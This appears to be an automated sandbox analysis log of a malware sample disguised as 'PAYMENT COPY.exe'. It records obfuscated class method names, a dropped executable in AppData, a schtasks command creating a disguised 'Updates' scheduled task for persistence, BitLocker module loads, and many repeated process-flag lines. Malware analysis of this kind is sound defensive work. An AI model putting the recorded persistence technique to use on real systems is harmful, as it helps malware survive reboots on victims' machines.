Source: 0.2.PAYMENT COPY.exe.3e85828.6.raw.unpack, syEU370nRtqeod8F9I.cs	High entropy of concatenated method names: 'w6nCHTSnQ1', 'bQqCspE63l', 'XatCXwMjqP', 'OWBCwFI5db', 'SdvCL8NSr9', 'pCdCEE19ap', 'LSZCDEnBDv', 'KEACNUDUv1', 'NXYCYXMqFB', 'ygCC2FBhlk'
Source: 0.2.PAYMENT COPY.exe.3e85828.6.raw.unpack, Hy0i60zrWMeUFdfF48.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'B7qWjKGmaq', 'W81W7nlp2K', 'LhqWKQ7jEC', 'CiOWxP4Pxe', 'yAZWCcYMCZ', 'Q3CWW09CAq', 'y2tWZqF0CD'
Source: 0.2.PAYMENT COPY.exe.3e85828.6.raw.unpack, MoqQA5AkmEQg0AXMs8.cs	High entropy of concatenated method names: 'RfQEHw29Pu', 'nM2EXWaHQI', 'QXNELpVJEj', 'IKMLmr3R14', 'DFILzZnfpr', 'kadEu264Pn', 'wmbEvQCtJQ', 'onlEbpoUsy', 'OrrEJWQPyY', 'W5uEdIZA5M'
Source: 0.2.PAYMENT COPY.exe.3e85828.6.raw.unpack, eaaGqlpqNLaOV5QOy7.cs	High entropy of concatenated method names: 'RDCXaTRNoF', 'KQ8XT8apa5', 'UGyXtaKF5b', 'c7mXpxYvmn', 'psZX7Xvtar', 'NjFXKd5E1M', 'rmCXxPhcM8', 'A4pXCAoW1n', 'caWXW0EVu4', 'sChXZ87Zov'
Source: 0.2.PAYMENT COPY.exe.3e85828.6.raw.unpack, vo8fZ29SItuYXYCU8u.cs	High entropy of concatenated method names: 'Orj7UYL0wg', 'soH7MDMAfB', 'O1x79deD5m', 'I1b7FffleC', 'SpT7gdhhYP', 'EZw7lhk0Vg', 'x5T7yTIpn2', 'a6Z7PklP3n', 'b0p7oyfpSy', 'X5W7ABPPv1'
Source: 0.2.PAYMENT COPY.exe.3e85828.6.raw.unpack, jMAIFBBHEXUdun993q.cs	High entropy of concatenated method names: 'ngLw3NQN2H', 'RMhwkMVT7n', 'j72XlQ4D4t', 'zmSXyaYq6s', 'XsJXPoQLGM', 'j0iXoGPRoc', 'rBRXAerrnF', 'faOX1bLvSp', 'dNKXOZ8FgY', 'FRdXU8ROIF'
Source: 0.2.PAYMENT COPY.exe.3e85828.6.raw.unpack, mKLvRhsuEjbx6yoRXr.cs	High entropy of concatenated method names: 'Dispose', 'zb7vcyf6rj', 'JDQbgdxVtS', 'sNgUUklOdH', 'fZyvmEU37n', 'etqvzeod8F', 'ProcessDialogKey', 'RIgbumW280', 'XjwbvadiB8', 'ilwbbERmVI'
Source: 0.2.PAYMENT COPY.exe.3e85828.6.raw.unpack, NgOGr2vv4xJC63Xb0ee.cs	High entropy of concatenated method names: 'ToString', 'Yh9ZJqqLHd', 'rlLZdJ2MCg', 'KweZR8KGne', 'Oc8ZHY5foD', 'THyZsb4gjS', 'puKZXKdfL3', 'zdCZwGdgkW', 'ku4Wy8IR1dCEYcACIah', 'oeAaiNI136gbh1ODuuk'
Source: 0.2.PAYMENT COPY.exe.3e85828.6.raw.unpack, ERkmwMy4JAXCv54sm4.cs	High entropy of concatenated method names: 'aXNLSh8PAM', 'TROLnwFIPk', 'B6gLfId3HG', 'FZiLafJqe9', 'Ym1LTnCn6p', 'ub5LkDKQBI', 'V04LpHvV12', 'OrELBA0PaD', 'gXstEFUfUwU3uYRCVfk', 'fELBsrUpIyvEocVHJH7'
Source: 0.2.PAYMENT COPY.exe.3e85828.6.raw.unpack, qSVh2KvJvqpeU0jVMPf.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'QdxZ9mTdsJ', 'TyaZFw749Q', 'nMwZ8ip3cV', 'GjsZG1hkrD', 'jZxZqCpTUb', 'zSeZe8DEQr', 'zuoZ49UVS9'
Source: 0.2.PAYMENT COPY.exe.3e85828.6.raw.unpack, GTiLeWdGZlvUGlNVTy.cs	High entropy of concatenated method names: 'mr6vE2SWHN', 'EZUvDOmUXT', 'IqNvYLaOV5', 'vOyv27EMAI', 'y99v73qtlO', 'H4bvKmYotQ', 'FKClt19gispWGxLfWo', 'e0ejC4kUOMH70t0ocQ', 'rQhvvMtGrm', 'AEtvJv1dse'
Source: 0.2.PAYMENT COPY.exe.3e85828.6.raw.unpack, DXmpSuDxiAr5R4r1KM.cs	High entropy of concatenated method names: 'NTUJR1hXk6', 'aUEJH3mehf', 'Mb0Jsh4sAk', 'Dy5JXDNSXV', 'zHQJwaUL6V', 'OfmJL4q54A', 'JsqJEBNhJD', 'pRLJDcxJf2', 'hktJNZifSD', 'OQLJY67GgJ'
Source: 0.2.PAYMENT COPY.exe.3e85828.6.raw.unpack, VOBIAXbFwqvXfOuk3q.cs	High entropy of concatenated method names: 'z9hfBhB5O', 'AJKaD9GoJ', 'hPJTmlUfP', 'back2msIV', 'RMJpNfo65', 'VlAB8OqJA', 'o1CY1bnTq3VkxnBrc6', 'LtlntLrYmZBvYy6tB8', 'ETYCSynjS', 'hUmZem540'
Source: 0.2.PAYMENT COPY.exe.3e85828.6.raw.unpack, VCyJAbeUtQVB7xPpae.cs	High entropy of concatenated method names: 'Rbdx0QVRoU', 'fdSxmVdcY6', 'cTRCu5Hgma', 'tLYCvUCnEV', 'ILhx6hsnh3', 'ikSxMHBc3j', 'PWjxhbswwq', 'vJpx92lV6E', 'Nd1xFcZcCc', 'QQLx8DrQLv'
Source: 0.2.PAYMENT COPY.exe.3e85828.6.raw.unpack, j0o43GhnibgOnEox3l.cs	High entropy of concatenated method names: 'OiQjtj4vd7', 'L2Pjp3MIqY', 'BXvjVgd1cs', 'uhkjglMyWY', 'tkEjyX4q7n', 'Y9EjPC9FmA', 'eV3jAB4sYA', 'FvZj1n1xm9', 're4jUHEnkF', 'yHTj6VHuTx'

Source: C:\Users\user\Desktop\PAYMENT COPY.exe

File created: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe

Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\PAYMENT COPY.exe

Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bQrgcvrrXfGN" /XML "C:\Users\user\AppData\Local\Temp\tmp525.tmp"

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
